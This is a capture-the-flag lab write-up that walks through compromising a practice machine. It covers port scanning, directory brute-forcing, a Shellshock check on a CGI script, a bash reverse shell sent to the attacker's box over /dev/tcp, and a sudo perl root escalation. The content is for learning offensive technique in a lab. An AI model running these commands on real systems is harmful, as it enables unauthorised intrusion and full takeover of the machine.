- Target: 10.10.10.56
- Goal: Root access
Port Scanning
nmap -p- -A 10.10.10.56

- Port 80/tcp: Apache httpd 2.4.18
- Port 2222/tcp: SSH (OpenSSH 7.2p2 Ubuntu 4ubuntu2.2)
Enumeration
Let’s look at the website:

Only an image. There’s no other information or links. Let’s use gobuster to see any hidden files or directories:
gobuster -u http://10.10.10.56:80/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -e -k -l -s "200,204,301,302,307,401,403" -x "txt,html,php,asp,aspx,jsp"

The /cgi-bin looks interesting. While it’s permission denied, files within the directory maybe accessible. Let’s do another gobuster scan on /cgi-bin.
gobuster -u http://10.10.10.56/cgi-bin -x sh,pl -w /usr/share/wordlists/dirb/common.txt

Found file user.sh inside /cgi-bin directory. Let’s check out the file. Browsing the file resulted in downloading a plain text file:
Content-Type: text/plain Just an uptime test script 09:51:31 up 1:45, 0 users, load average: 0.00, 0.00, 0.00
There really has nothing on the website other than this user.sh shell script. Let’s test if it is vulnerable to Shellshock using nmap script engine.
nmap -p80 -sV --script http-shellshock --script-args "uri=/cgi-bin/user.sh" 10.10.10.56

Looking good. It’s vulnerable to Shellshock.
Exploitation
I am using bash reverse shell to try to get shell access. First start a Netcat listener at port 4444 at kali box:
nc -lp 4444
Then use the following bash reverse shell command and use in the Shellshock exploit:
/bin/bash -i >& /dev/tcp/10.10.14.21/4444 0>&1


Obtained limited shell as shelly.
Privilege Escalation
sudo -l
It shows that shelly can run perl as root. That makes privilege escalation pretty straight forward:
sudo perl -e 'exec("/bin/bash")'

Root access obtained.
Capture the Flag
Simply go to /home/shelly/user.txt and /root/root.txt to capture the flags.

